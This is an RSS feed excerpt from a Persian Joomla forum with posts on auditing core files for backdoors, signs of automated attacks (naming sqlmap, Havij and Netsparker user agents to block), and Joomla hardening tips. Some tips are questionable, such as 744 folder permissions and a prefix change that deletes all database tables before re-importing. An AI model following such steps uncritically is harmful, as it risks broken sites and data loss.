سپس روی دکمه Start your free audit now! کلیک کنید و مراحل معرفی سایت رو ساخت کاربری رو طی کنید.در آخر شما باید یک پلاگین رو دانلود و روی سایت خودتون نصب کنید.توجه داشته باشید که این یک پلاگین واقعی نیست و فقط به سایت اجازه دسترسی و بررسی سایت شمارو میده.<br />
بعد از اتمام مراحل لیستی از مشکلات موجود رو به شما نمایش میده که البته نترسید همشون مشکل نیستند و شاید هیچکدوم هم مشکل نباشند چون در جوملای ترجمه شده در خیلی از فایل ها تغییرات ایجاد شده.<br />
<br />
<span style="font-weight: bold;">این سایت فعلا فقط جوملا 1.5 و جوملا 2.5 رو ساپورت میکند!</span><br />
<br />
میتونید تمام تغییرات رو مشاهده کنید و اگر مورد مشکوکی دیدید مخصوصا بعد از هک شدن سایت اون مورد یا کد رو بررسی و حذف کنید.<br />
این سایت امکانات تجاری و رایگان جالبی دارد که هنوز کامل نشده و امیدوارم کارآمد باشه !<br />
بدرود]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://forums.parsjoom.ir/imgup/1/1360961420_1_90f32a9fda.jpg" border="0" alt="[تصویر:  1360961420_1_90f32a9fda.jpg]" /></div>
<br />
درود<br />
امشب سایتی رو به شما معرفی میکنم که میتوانید توسط اون تمامی فایل های سایت جوملایی خود را بررسی کنید حالا چه بعد از هک شدن سایت و چه قبل از ان.<br />
ممکن شما یک بسته ای رو از جایی دانلود کنید که احتمال داره در یکی از فایل های اون بکدور گذاشته باشند و یا هکری که سایت شما رو هک کرده یک بکدور برای دسترسی های بعدی قرار داده باشه.<br />
هرچند بهترین کار گرفتن و ذخیره کردن بک آپ می باشد ولی خوب چون ما ایرانی ها اکثرمون اصولا در این نکته کاهلی میکنیم همیشه با مشکلات اینگونه مواجه هستیم.<br />
خارج از مبحث هک شدن یا نشدن سایت یا دانلود بسته های مشکوک و آلوده میتوانید از این روش برای متوجه شدن تغییراتی که درجوملا داده شده نیز استفاده کنید مثلا بررسی تفاوت جوملای فارسی شده با جوملای انگلیسی.<br />
توجه داشته باشید قالب ها رو نمیتونید با این ابزار مقایسه کنید و فقط فایل های اصلی و پایه جوملا رو که در بسته نصبی جوملای اصلی دانلود شده از جوملای جهانی میتونید تطبیق دهید !<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
سپس روی دکمه Start your free audit now! کلیک کنید و مراحل معرفی سایت رو ساخت کاربری رو طی کنید.در آخر شما باید یک پلاگین رو دانلود و روی سایت خودتون نصب کنید.توجه داشته باشید که این یک پلاگین واقعی نیست و فقط به سایت اجازه دسترسی و بررسی سایت شمارو میده.<br />
بعد از اتمام مراحل لیستی از مشکلات موجود رو به شما نمایش میده که البته نترسید همشون مشکل نیستند و شاید هیچکدوم هم مشکل نباشند چون در جوملای ترجمه شده در خیلی از فایل ها تغییرات ایجاد شده.<br />
<br />
<span style="font-weight: bold;">این سایت فعلا فقط جوملا 1.5 و جوملا 2.5 رو ساپورت میکند!</span><br />
<br />
میتونید تمام تغییرات رو مشاهده کنید و اگر مورد مشکوکی دیدید مخصوصا بعد از هک شدن سایت اون مورد یا کد رو بررسی و حذف کنید.<br />
این سایت امکانات تجاری و رایگان جالبی دارد که هنوز کامل نشده و امیدوارم کارآمد باشه !<br />
بدرود]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[مقاله: نشانه های حمله به سایت را بشناسید... ]]></title>
			<link>https://forums.parsjoom.ir/thread-8876.html</link>
			<pubDate>Mon, 05 Nov 2012 07:31:43 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-8876.html</guid>
			<description><![CDATA[حمله ه-ک رها یکی از نگرانی‌های مهمی است که همواره در کمین فعالان فضای مجازی بوده و موجب می‌شود گردانندگان سایت‌های مختلف به طور دائم از ه-ک شدن سایت‌های خود بیم داشته باشند.<br />
<br />
تجربه نیز اینگونه ثابت کرده است که در موارد متعدد سایت‌هایی که اهمیت و بازدید بیش‌تری دارند بیش از سایر سایت‌ها مورد علاقه ه-ک رها قرار می‌گیرند و در معرض حملات بیش‌تری قرار دارند. اما راه تشخیص این حملات از چه قرار است؟<br />
<br />
به گزارش ایسنا، اگر جست‌وجویی کوتاه در اینترنت داشته باشید علاوه بر مواجهه با لیستی بلند بالا از سایتهایی که ه-ک شده‌اند و هر لحظه هم بر تعداد آن‌ها افزوده می‌شود، در موارد متعدد حتی با سایتهایی روبه رو خواهید شد که مدعی آموزش اینترنتی شیوه‌های ه-ک کردن هستند.<br />
<br />
به گزارش مرکز مدیریت امداد و هماهنگی عملیات رخدادهای رایانه‌یی (ماهر)، ه-ک رها به ابزارهای حملات خودکار تزریق SQL و Remote File Inclusion علاقه ویژه‌ای دارند و با استفاده از نرم‌افزارهایی مانند sqlmap، Havij یا NetSparker، پیدا کردن و سوء استفاده از آسیب‌پذیری‌های وب‌سایت‌ها حتی برای مهاجمان تازه‌کار سریع و آسان است.<br />
<br />
ه-ک رها به سه دلیل کلیدی به ابزارهای خودکار علاقه دارند. نخست اینکه این ابزارها نیاز به مهارت بسیار کمی برای استفاده دارند و اغلب به‌طور رایگان در دسترس هستند (از طریق فروم‌های ه-ک رها یا سایت‌های تولید کنندگان آن‌ها که این ابزارها را به عنوان ابزارهای معتبر تست نفوذ طراحی کرده‌اند). دومین دلیل این است که این ابزارها ه-ک ر را قادر می‌سازند که در زمانی کوتاه و با تلاشی کم به تعداد زیادی سایت حمله کند و بالاخره اینکه این ابزارها استفاده بهینه را از سرورهای آلوده که ممکن است تنها برای مدت محدودی در اختیار آنها باشند، به عمل می‌آورند.<br />
<br />
اما نکته مثبت اینجاست که درصورتی‌که شما بتوانید راهی برای کشف و مسدود کردن حملات خودکار پیدا کنید، خواهید توانست حجم زیادی از حملات ه-ک ری را بر روی سایت خود متوقف کنید. در این گزارش نحوه شناسایی ترافیک خرابکارانه تولید شده توسط این ابزارهای خودکار شرح داده خواهد شد.<br />
<br />
نشانه اول: نرخ بالای درخواست ورودی<br />
<br />
یکی از نشانه‌های کلیدی یک حمله خودکار، نرخ رسیدن درخواست‌های ورودی است. احتمال اینکه یک انسان بتواند بیش از یک درخواست HTTP در هر 5 ثانیه تولید کند بسیار پایین است. اما ابزارهای خودکار اغلب حدود 70 درخواست در دقیقه تولید می‌کنند (یعنی بیش از یک درخواست در ثانیه). یک انسان نمی‎تواند به‌طور عادی با این سرعت کار کند.<br />
<br />
اکنون مسأله ساده به نظر می‌رسد. هر ترافیکی که با نرخی بیش از یک درخواست در 5 ثانیه برسد، باید توسط این ابزارها تولید شده باشد. اما متأسفانه قضیه به این سادگی نیست.<br />
<br />
نخست اینکه تمامی ترافیک‌های تولید شده توسط ابزارهای خودکار، خرابکارانه نیستند. حجم قابل توجهی از ترافیک خودکار توسط کسانی مانند گوگل تولید می‌شود که تنها کاری که انجام می‌دهند این است که سایت شما را در فهرست خود قرار داده و اصطلاحا ایندکس می‌کند تا دیگران بتوانند به سادگی شما را پیدا کنند.<br />
<br />
از طرف دیگر تمام ترافیک‌هایی که با نرخ بالا وارد می‌شوند، لزوما توسط ابزارهای خودکار تولید نمی‌شوند. ممکن است به نظر برسد که سرویس‌هایی مانند شبکه‌های تحویل محتوا (content delivery) و پراکسی‌ها، منبع حجم زیادی از ترافیک هستند، اما ممکن است قضیه صرفا تراکم تعداد زیادی کاربر مختلف باشد.<br />
<br />
اما نکته مهمتر این است که بسیاری از ه-ک رها آنقدر پیچیده هستند که بدانند که تولید درخواست با نرخ بالا به سادگی قابل تشخیص است و در نتیجه تاکتیک‌هایی را برای جلوگیری از تشخیص این ابزارها به کار می‌برند. این تاکتیک‌ها می‌توانند به شرح زیر باشند:<br />
<br />
** کم کردن عمدی سرعت ابزار<br />
<br />
کم کردن عمدی سرعت ابزار برای شبیه کردن الگوی ترافیک آن به ترافیک تولید شده توسط انسان یکی از راه هایی است که ه-ک رها علاقه خاصی نسبت به آن نشان می دهند.<br />
<br />
**حمله به سایت‌های دیگر به‌طور موازی<br />
<br />
این کار عبارت است از استفاده از ابزارهای حمله خودکار برای ارسال ترافیک به چند سایت به صورت گردشی. در نتیجه اگرچه ابزار درخواست‌ها را با نرخ بالایی تولید می‌کند، اما هر سایت ترافیکی با نرخی مشابه ترافیک انسانی دریافت می‌کند.<br />
<br />
**استفاده از چندین میزبان برای اجرای حملات<br />
<br />
این روش پیچیده‌تر، ه-ک رها را قادر می‌سازد که به یک سایت طوری حمله کنند که تمامی ترافیک از یک آدرس آی‌پی واحد و قابل شناسایی ارسال نشود.<br />
<br />
در نتیجه، نرخ بالای ترافیک درخواست‌های ورودی فقط یک نشانه از حمله خودکار است. نشانه‌های دیگری نیز در این مورد وجود دارند.<br />
<br />
نشانه دوم: هدرهای HTTP<br />
<br />
هدرهای HTTP می‌توانند نشانه ارزشمند دیگری از طبیعت ترافیک ورودی باشند. برای مثال، ابزارهای خودکار تزریق SQL مانند sqlmap، Havij و Netsparker همگی به درستی خود را در هدرهای درخواست‌های HTTP توسط رشته‌های توصیفی عامل کاربر (User Agent) معرفی می‌کنند. این بدان علت است که این ابزارها با این هدف ساخته شده‌اند که برای تست نفوذ معتبر مورد استفاده قرار بگیرند. همینطور حملات نشأت گرفته از اسکریپت‌های Perl نیز ممکن است توسط یک عامل کاربر libwww-perl شناسایی شوند.<br />
<br />
روشن است که هر ترافیکی که حاوی نام این ابزارها در رشته عامل کاربر (User Agent) باشد باید مسدود شود. قطعا این رشته‌ها می‌توانند تغییر کنند، ولی ه-ک رهای تازه‌کار اغلب از این موضوع ناآگاه هستند.<br />
<br />
حتی اگر ابزارها شامل رشته‌های معرفی کننده نباشند، تحقیقات Imperva نشان داده است که بسیاری از این ابزارها بخش‌هایی از اطلاعات هدرها را که اغلب مرورگرها در درخواست‌های وب انتظار آن را دارند، ارسال نمی‌کنند. این بخش‌ها شامل هدرهایی مانند Accept-Language و Accept-Charset می‌شود.<br />
<br />
البته یک ه-ک ر زرنگ می‌تواند سیستم خود را طوری پیکربندی کنند که این هدرها را اضافه کند. ولی بسیاری نیز این کار را انجام نمی‌دهند. نبود این هدرها باید یک نشانه هشدار دهنده به شمار رود و در ترکیب با نرخ بالای درخواست‌ها، نشانه‌ای بسیار قوی از ترافیک خرابکارانه محسوب می‌شود.<br />
<br />
*نشانه سوم: ردپای ابزار حمله<br />
<br />
ابزارهای حمله گستره محدودی از فعالیت‌های مختلف را می‌توانند انجام دهند. Imperva کشف کرده است که برخی اوقات با تحلیل رکوردهای ترافیکی که توسط حملات خودکار تولید می‌شوند، می‌توان به الگوهایی دست یافت (مانند رشته‌های خاص در دستورات SQL تولید شده در تزریق SQL) که به طور یکتا یک ابزار خاص را معرفی می‌کنند. برخی اوقات این رشته‌ها با بررسی کد منبع یک ابزار قابل کشف هستند.<br />
<br />
این ردپاها می‌توانند اساس قوانین مسدود کردن در فایروال را تشکیل دهند، ولی توجه به این نکته مهم است که ممکن است این ردپاها در نسخه‌های بعدی ابزار تغییر کنند.<br />
<br />
* نشانه چهارم: جغرافیای غیر معمول<br />
<br />
Imperva کشف کرده است که 30 درصد از حملات تزریق SQL با نرخ بالا از چین نشأت گرفته‌اند و سایر حملات از کشورهای غیر معمول نشأت می‌گیرند. توصیه می‌شود که در مورد ترافیک‌های تولید شده از کشورهایی که انتظار آن را ندارید، مشکوک باشید.<br />
<br />
یک افزایش ناگهانی در ترافیک تولید شده توسط مناطق جغرافیایی غیر منتظره به تنهایی اثبات کننده هیچ چیز نیست، اما در ترکیب با سایر نشانه‌ها مانند هدرهای HTTP یا نرخ بالای درخواست ورودی، باید مورد توجه قرار گرفته و یا حتی منجر به مسدود کردن کل ترافیک شود.<br />
<br />
*نشانه پنجم: لیست‌های سیاه آی‌پی<br />
<br />
هر زمان که حمله‌ای توسط متدی تشخیص داده می‌شود، آدرس آی‌پی منبع می‌تواند ثبت شود. گروه تحقیقاتی Imperva کشف کرده است که حملات خودکار از یک آدرس آی‌پی یکتا معمولا تمایل دارند بین سه تا پنج روز از آن آدرس منتشر شوند.<br />
<br />
اما برخی آدرس‌های آی‌پی برای هفته‌ها یا حتی ماه‌ها منبع ترافیک خودکار خرابکارانه باقی می‌مانند. این بدان معنی است که آدرس‌های لیست سیاه می‌توانند در جلوگیری از حملات خودکار آتی از آن منبع بسیار سودمند باشند. ارائه دهندگان امنیت ابری می‌توانند با قرار دادن هر سایتی که منبع حملات خودکار بر روی هریک از کلاینت‌ها است در لیست سیاه، سایر کلاینت‌ها را نیز در برابر آن محافظت کنند.<br />
<br />
ارادتمند، رضا اعتمادی نیا<br />
<br />
منبع: ایسنا<br />
<br />
با احترام]]></description>
			<content:encoded><![CDATA[حمله ه-ک رها یکی از نگرانی‌های مهمی است که همواره در کمین فعالان فضای مجازی بوده و موجب می‌شود گردانندگان سایت‌های مختلف به طور دائم از ه-ک شدن سایت‌های خود بیم داشته باشند.<br />
<br />
تجربه نیز اینگونه ثابت کرده است که در موارد متعدد سایت‌هایی که اهمیت و بازدید بیش‌تری دارند بیش از سایر سایت‌ها مورد علاقه ه-ک رها قرار می‌گیرند و در معرض حملات بیش‌تری قرار دارند. اما راه تشخیص این حملات از چه قرار است؟<br />
<br />
به گزارش ایسنا، اگر جست‌وجویی کوتاه در اینترنت داشته باشید علاوه بر مواجهه با لیستی بلند بالا از سایتهایی که ه-ک شده‌اند و هر لحظه هم بر تعداد آن‌ها افزوده می‌شود، در موارد متعدد حتی با سایتهایی روبه رو خواهید شد که مدعی آموزش اینترنتی شیوه‌های ه-ک کردن هستند.<br />
<br />
به گزارش مرکز مدیریت امداد و هماهنگی عملیات رخدادهای رایانه‌یی (ماهر)، ه-ک رها به ابزارهای حملات خودکار تزریق SQL و Remote File Inclusion علاقه ویژه‌ای دارند و با استفاده از نرم‌افزارهایی مانند sqlmap، Havij یا NetSparker، پیدا کردن و سوء استفاده از آسیب‌پذیری‌های وب‌سایت‌ها حتی برای مهاجمان تازه‌کار سریع و آسان است.<br />
<br />
ه-ک رها به سه دلیل کلیدی به ابزارهای خودکار علاقه دارند. نخست اینکه این ابزارها نیاز به مهارت بسیار کمی برای استفاده دارند و اغلب به‌طور رایگان در دسترس هستند (از طریق فروم‌های ه-ک رها یا سایت‌های تولید کنندگان آن‌ها که این ابزارها را به عنوان ابزارهای معتبر تست نفوذ طراحی کرده‌اند). دومین دلیل این است که این ابزارها ه-ک ر را قادر می‌سازند که در زمانی کوتاه و با تلاشی کم به تعداد زیادی سایت حمله کند و بالاخره اینکه این ابزارها استفاده بهینه را از سرورهای آلوده که ممکن است تنها برای مدت محدودی در اختیار آنها باشند، به عمل می‌آورند.<br />
<br />
اما نکته مثبت اینجاست که درصورتی‌که شما بتوانید راهی برای کشف و مسدود کردن حملات خودکار پیدا کنید، خواهید توانست حجم زیادی از حملات ه-ک ری را بر روی سایت خود متوقف کنید. در این گزارش نحوه شناسایی ترافیک خرابکارانه تولید شده توسط این ابزارهای خودکار شرح داده خواهد شد.<br />
<br />
نشانه اول: نرخ بالای درخواست ورودی<br />
<br />
یکی از نشانه‌های کلیدی یک حمله خودکار، نرخ رسیدن درخواست‌های ورودی است. احتمال اینکه یک انسان بتواند بیش از یک درخواست HTTP در هر 5 ثانیه تولید کند بسیار پایین است. اما ابزارهای خودکار اغلب حدود 70 درخواست در دقیقه تولید می‌کنند (یعنی بیش از یک درخواست در ثانیه). یک انسان نمی‎تواند به‌طور عادی با این سرعت کار کند.<br />
<br />
اکنون مسأله ساده به نظر می‌رسد. هر ترافیکی که با نرخی بیش از یک درخواست در 5 ثانیه برسد، باید توسط این ابزارها تولید شده باشد. اما متأسفانه قضیه به این سادگی نیست.<br />
<br />
نخست اینکه تمامی ترافیک‌های تولید شده توسط ابزارهای خودکار، خرابکارانه نیستند. حجم قابل توجهی از ترافیک خودکار توسط کسانی مانند گوگل تولید می‌شود که تنها کاری که انجام می‌دهند این است که سایت شما را در فهرست خود قرار داده و اصطلاحا ایندکس می‌کند تا دیگران بتوانند به سادگی شما را پیدا کنند.<br />
<br />
از طرف دیگر تمام ترافیک‌هایی که با نرخ بالا وارد می‌شوند، لزوما توسط ابزارهای خودکار تولید نمی‌شوند. ممکن است به نظر برسد که سرویس‌هایی مانند شبکه‌های تحویل محتوا (content delivery) و پراکسی‌ها، منبع حجم زیادی از ترافیک هستند، اما ممکن است قضیه صرفا تراکم تعداد زیادی کاربر مختلف باشد.<br />
<br />
اما نکته مهمتر این است که بسیاری از ه-ک رها آنقدر پیچیده هستند که بدانند که تولید درخواست با نرخ بالا به سادگی قابل تشخیص است و در نتیجه تاکتیک‌هایی را برای جلوگیری از تشخیص این ابزارها به کار می‌برند. این تاکتیک‌ها می‌توانند به شرح زیر باشند:<br />
<br />
** کم کردن عمدی سرعت ابزار<br />
<br />
کم کردن عمدی سرعت ابزار برای شبیه کردن الگوی ترافیک آن به ترافیک تولید شده توسط انسان یکی از راه هایی است که ه-ک رها علاقه خاصی نسبت به آن نشان می دهند.<br />
<br />
**حمله به سایت‌های دیگر به‌طور موازی<br />
<br />
این کار عبارت است از استفاده از ابزارهای حمله خودکار برای ارسال ترافیک به چند سایت به صورت گردشی. در نتیجه اگرچه ابزار درخواست‌ها را با نرخ بالایی تولید می‌کند، اما هر سایت ترافیکی با نرخی مشابه ترافیک انسانی دریافت می‌کند.<br />
<br />
**استفاده از چندین میزبان برای اجرای حملات<br />
<br />
این روش پیچیده‌تر، ه-ک رها را قادر می‌سازد که به یک سایت طوری حمله کنند که تمامی ترافیک از یک آدرس آی‌پی واحد و قابل شناسایی ارسال نشود.<br />
<br />
در نتیجه، نرخ بالای ترافیک درخواست‌های ورودی فقط یک نشانه از حمله خودکار است. نشانه‌های دیگری نیز در این مورد وجود دارند.<br />
<br />
نشانه دوم: هدرهای HTTP<br />
<br />
هدرهای HTTP می‌توانند نشانه ارزشمند دیگری از طبیعت ترافیک ورودی باشند. برای مثال، ابزارهای خودکار تزریق SQL مانند sqlmap، Havij و Netsparker همگی به درستی خود را در هدرهای درخواست‌های HTTP توسط رشته‌های توصیفی عامل کاربر (User Agent) معرفی می‌کنند. این بدان علت است که این ابزارها با این هدف ساخته شده‌اند که برای تست نفوذ معتبر مورد استفاده قرار بگیرند. همینطور حملات نشأت گرفته از اسکریپت‌های Perl نیز ممکن است توسط یک عامل کاربر libwww-perl شناسایی شوند.<br />
<br />
روشن است که هر ترافیکی که حاوی نام این ابزارها در رشته عامل کاربر (User Agent) باشد باید مسدود شود. قطعا این رشته‌ها می‌توانند تغییر کنند، ولی ه-ک رهای تازه‌کار اغلب از این موضوع ناآگاه هستند.<br />
<br />
حتی اگر ابزارها شامل رشته‌های معرفی کننده نباشند، تحقیقات Imperva نشان داده است که بسیاری از این ابزارها بخش‌هایی از اطلاعات هدرها را که اغلب مرورگرها در درخواست‌های وب انتظار آن را دارند، ارسال نمی‌کنند. این بخش‌ها شامل هدرهایی مانند Accept-Language و Accept-Charset می‌شود.<br />
<br />
البته یک ه-ک ر زرنگ می‌تواند سیستم خود را طوری پیکربندی کنند که این هدرها را اضافه کند. ولی بسیاری نیز این کار را انجام نمی‌دهند. نبود این هدرها باید یک نشانه هشدار دهنده به شمار رود و در ترکیب با نرخ بالای درخواست‌ها، نشانه‌ای بسیار قوی از ترافیک خرابکارانه محسوب می‌شود.<br />
<br />
*نشانه سوم: ردپای ابزار حمله<br />
<br />
ابزارهای حمله گستره محدودی از فعالیت‌های مختلف را می‌توانند انجام دهند. Imperva کشف کرده است که برخی اوقات با تحلیل رکوردهای ترافیکی که توسط حملات خودکار تولید می‌شوند، می‌توان به الگوهایی دست یافت (مانند رشته‌های خاص در دستورات SQL تولید شده در تزریق SQL) که به طور یکتا یک ابزار خاص را معرفی می‌کنند. برخی اوقات این رشته‌ها با بررسی کد منبع یک ابزار قابل کشف هستند.<br />
<br />
این ردپاها می‌توانند اساس قوانین مسدود کردن در فایروال را تشکیل دهند، ولی توجه به این نکته مهم است که ممکن است این ردپاها در نسخه‌های بعدی ابزار تغییر کنند.<br />
<br />
* نشانه چهارم: جغرافیای غیر معمول<br />
<br />
Imperva کشف کرده است که 30 درصد از حملات تزریق SQL با نرخ بالا از چین نشأت گرفته‌اند و سایر حملات از کشورهای غیر معمول نشأت می‌گیرند. توصیه می‌شود که در مورد ترافیک‌های تولید شده از کشورهایی که انتظار آن را ندارید، مشکوک باشید.<br />
<br />
یک افزایش ناگهانی در ترافیک تولید شده توسط مناطق جغرافیایی غیر منتظره به تنهایی اثبات کننده هیچ چیز نیست، اما در ترکیب با سایر نشانه‌ها مانند هدرهای HTTP یا نرخ بالای درخواست ورودی، باید مورد توجه قرار گرفته و یا حتی منجر به مسدود کردن کل ترافیک شود.<br />
<br />
*نشانه پنجم: لیست‌های سیاه آی‌پی<br />
<br />
هر زمان که حمله‌ای توسط متدی تشخیص داده می‌شود، آدرس آی‌پی منبع می‌تواند ثبت شود. گروه تحقیقاتی Imperva کشف کرده است که حملات خودکار از یک آدرس آی‌پی یکتا معمولا تمایل دارند بین سه تا پنج روز از آن آدرس منتشر شوند.<br />
<br />
اما برخی آدرس‌های آی‌پی برای هفته‌ها یا حتی ماه‌ها منبع ترافیک خودکار خرابکارانه باقی می‌مانند. این بدان معنی است که آدرس‌های لیست سیاه می‌توانند در جلوگیری از حملات خودکار آتی از آن منبع بسیار سودمند باشند. ارائه دهندگان امنیت ابری می‌توانند با قرار دادن هر سایتی که منبع حملات خودکار بر روی هریک از کلاینت‌ها است در لیست سیاه، سایر کلاینت‌ها را نیز در برابر آن محافظت کنند.<br />
<br />
ارادتمند، رضا اعتمادی نیا<br />
<br />
منبع: ایسنا<br />
<br />
با احترام]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[راهکارهای افزایش امنیت سایت های جوملایی ]]></title>
			<link>https://forums.parsjoom.ir/thread-8177.html</link>
			<pubDate>Tue, 11 Sep 2012 06:47:33 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-8177.html</guid>
			<description><![CDATA[با توجه به گسترش روزافزون هکرهای اینترنتی، افزایش امنیت سیستم مدیریت محتوای سایت شما بسیار مهم و حیاتی می باشد.<br />
بسیاری از طراحان وب بیشترین زمان خود را صرف طراحی گرافیکی و بالا بردن رتبه سایت در گوگل می کنند و زمان نسبتا کمی را برای بالا بردن امنیت سایت صرف می کنند.<br />
در این مقاله سعی شده است تا با ارائه راه کارهای مختلف شما را در بالاتر بردن امنیت سیستم مدیریت محتوا جوملا یاری رساند.<br />
<br />
1.ایجاد بک‌آپ از سایت<br />
اولین و مهمترین قدم در جلوگیری از عواقب هک شدن سایت ایجاد بک‌آپ از سایت می باشد که این بک‌آپ شامل فایل های اصلی جوملا و نیز دیتابیش جوملا می شود.<br />
گرفتن بک‌آپ بصورت ماهیانه را در برنامه خود بگنجانید زیرا با در اختیار داشتن بک‌آپ شما می توانید درصورت مواجهه با هر مشکلی آن را صرف چند ساعت به حالت اولیه بازگردانید.<br />
<br />
2.بروزرسانی نسخه جوملا<br />
با توجه به کدباز بودن سیستم مدیریت محتوا جوملا، احتمال یافت شدن رخنه های امنیتی در آن بالا می باشد و برای درامان ماندن از هک بوسیله این رخنه های امنیتی شما می بایست همیشه از آخرین نسخه های جوملا که توسط وب سایت رسمی جوملا منتشر می شود استفاده نمایید.<br />
<br />
3.احتیاط در استفاده از ماژول و کامپوننت ها<br />
ماژول ها و کامپوننت هایی که توسط خود جوملا منتشر نمی شوند به عنوان دسته سوم (3rd Party) شناخته می شوند.<br />
بسیاری از سایت های جوملایی بواسطه رخنه های امنیتی موجود در ماژول ها و کامپوننت های دسته سوم هک می شوند.<br />
در زمان نصب کامپوننت و ماژول دسته سوم نسبت به مسائل امنیتی آن تحقیق کنید و نیز آخرین نسخه های آن را نصب و بصورت مداوم بروز نمایید.<br />
در زمان حذف ماژول و کامپوننت نیز از پاک شدن کامل فایل های مربوط به آن و نیز اطلاعات مربوط در دیتابیس اطمینان حاصل نمایید.<br />
<br />
4.سطح دسترسی پوشه ها<br />
به محض پایان تنظیمات و نیز نصب کامپوننت ها و ماژول های لازم، سطح دسترسی تمامی پوشه های را به 744 تغییر دهید.<br />
برای انجام این کار می توانید از Cpanel ارائه شده استفاده نمایید.<br />
<br />
5.سطح دسترسی فایل ها<br />
سطح دسترسی تمامی فایل ها را به 644 تغییر دهید.<br />
<br />
6.سطح دسترسی به Configuration.php<br />
سطح دسترسی به این فایل را به 644 تغییر دهید.<br />
این مورد بسیار مهم می باشد چون تنظیمات اصلی جوملا در این فایل گنجانده شده است.<br />
<br />
7.امنیت .htaccess<br />
تمامی نسخه های منتشر شده جوملا شامل فایل .htaccess می باشند که شما می توانید با استفاده از آخرین نسخه این فایل بسیاری از رخنه های امنیتی شناخته شده در سایت خود را از بین ببرید.<br />
آخرین نسخه این فایل را به سرور انتقال داده و سطح دسترسی آن را به 644 تغییر دهید.<br />
<br />
8.تنظیم Register Globals<br />
در محیط مدیریتی جوملا از غیرفعال بودن Register Globals اطمینان حاصل کنید.<br />
در صورت روشن بودن آن (Register Globals Is Set To On) با شرکت میزبانی وب خود تماس گرفته و از آنها بخواهید تا این قابلیت را برای شما غیرفعال نمایند.<br />
راه دیگر برای غیرفعال کردن این قابلیت تغییر فایل .htaccess و افزودن کد زیر به آن می باشد.<br />
php_flag register_globals off<br />
<br />
<br />
<br />
جوملا (Joomla) سیستم مدیریت محتوا بسیار بزرگی است که در سراسر جهان مورد استفاده قرار می گیرد. به همین دلیل، هکرها اغلب سعی می کنند راهی برای نفوذ به وب سایت های ایجاد شده توسط جوملا پیدا کرده و به آن سایت ها حمله کنند. در این مقاله با ۷ نکته برای بهینه سازی سیستم امنیتی جوملا، برای جلوگیری از هک شدن وب سایت جوملای خود آشنا می شوید.به عنوان جعبه کمک های اولیه، همیشه به یاد داشته باشید به طور منظم یک نسخه ی پشتیبان (Backup) از وب سایت و پایگاه داده خود تهیه کنید. اگر در این حالت سایت شما هک شود، با استفاده از پشتیبان، همیشه می توانید به نسخه های قدیمی تر وب سایت خود برگردید. اطمینان حاصل کنید افزونه ای که باعث آسیب پذیری سایت شما گشته را پیدا کرده و آن را حذف کنید.<br />
تغییر پیشوند پیش فرض پایگاه داده (jos_)<br />
بیشتر حملات تزریق اس کیو ال (SQL injections) که به منظور هک نمودن وب سایت های جوملا نوشته می شوند، سعی در بازیابی داده ها از جدول . دارند. به این ترتیب، این حملات می توانند نام کاربری و رمزعبور مدیر وب سایت را بازیابی و در اختیار هکر قرار دهند. تغییر پیشوند پیش فرض به چیزی تصادفی، می تواند از اکثر و شاید همه حملات تزریق کد جلوگیری نماید.<br />
شما می توانید در هنگام نصب جوملا روی وب سایت، پیشوند پایگاه داده را تغییر داده و به چیزی دلخواه تنظیم کنید. اگر قبلا جوملا را نصب کرده و حالا می خواهید این پیشوند را تغییر دهید، اقدامات زیر را انجام دهید:<br />
• به سیستم مدیریت جوملای خود وارد شوید (Log on)<br />
• به تنظیمات سراسری (global configuration) رفته و پایگاه داده را جستجو کنید.<br />
• پیشوند پایگاه داده خود را تغییر دهید (به عنوان مثال: fdasqw_ یا _mohsen) و روی Save کلیک کنید.<br />
• برای دسترسی به پایگاه داده (database) خود به phpMyAdmin بروید.<br />
• به تب export بروید، تمام مقادیر پیش فرض را به حال خود رها کرده و دکمه Start را بزنید. ساخت و دانلود خروجی از بانک اطلاعاتی می تواند مدتی به طول بیانجامد.<br />
• وقتی که این کار انجام شد، همه کدهایی را که نمایش داده شده، انتخاب کرده و آن ها را در یک فایل متنی در notepad (یا هر ویرایشگر متنی دیگر) کپی کنید.<br />
• در phpMyAdmin ، همه جداول (tables) را انتخاب و آنها را حذف (delete) کنید.<br />
• در ویرایشگر متنی که کدها را وارد کرده اید عمل جستجو و جایگزینی (search and replace) را انجام دهید.در کادر عبارت جستجو jos_ را وارد کرده و در کادر جایگزینی با، پیشوند جدید خود (مثلا fdasqw_) را وارد کرده و دکمه Replace all را فشار دهید.<br />
• با زدن Ctrl + A همه متن را انتخاب کرد و از آن کپی بگیرید. در phpMyAdmin به SQL رفته، query ها (متن کپی شده) را پیست کرده و روی Start کلیک کنید.<br />
شماره نسخه و نام افزونه را حذف کنید<br />
بیشترین آسیب پذیری ها تنها در نسخه های ویژه ای از افزونه های (extension) خاص رخ می دهند. نمایش نسخه 2.14 از افزونه ای مثل MyExtension چیز واقعا بدی است. شما می توانید با انجام اقدامات زیر کاری کنید که این پیام تنها نام افزونه را نشان دهد:<br />
• همه فایل های افزونه را از روی سرور خود دانلود کنید.<br />
• برنامه Dreamweaver را باز کنید.<br />
• هر کدام از فایل های افزونه را که روی کامپیوتر خود دانلود کرده اید بارگذاری کنید.<br />
• از بخش جستجو استفاده کرده و جستجو را در حالت «Search through specified folder» تنظیم کنید. به پوشه ای که افزونه را در آن دانلود کرده اید، بروید.<br />
‏ • MyExtension 2.14 را به عنوان عبارت جستجو وارد نموده و OK کنید تا در تمامی فایل های پوشه انتخابی به دنبال آن بگردد.<br />
• هنگامی که فایل درست را یافتید، شماره ورژن (version number) را حذف کنید.<br />
• فایل تغییریافته را روی سرور آپلود کرده و بررسی کنید که تغییرات اعمال شده یا خیر.<br />
از عناصر متناسب با موتور جستجو استفاده کنید.<br />
اکثر هکرها از دستورGoogle inurl: command برای یافتن و بهره برداری از آسیب پذیرها بهره می گیرند. از افزونه های مبتنی بر SEF، sh404sef و ARTIO برای بازنویسی url در جوملا بر اساس اصول SEF استفاده کنید تا جلوی نفوذ هکرها از طریق پیدا کردن آسیب پذیری های اینچنینی را بگیرید.<br />
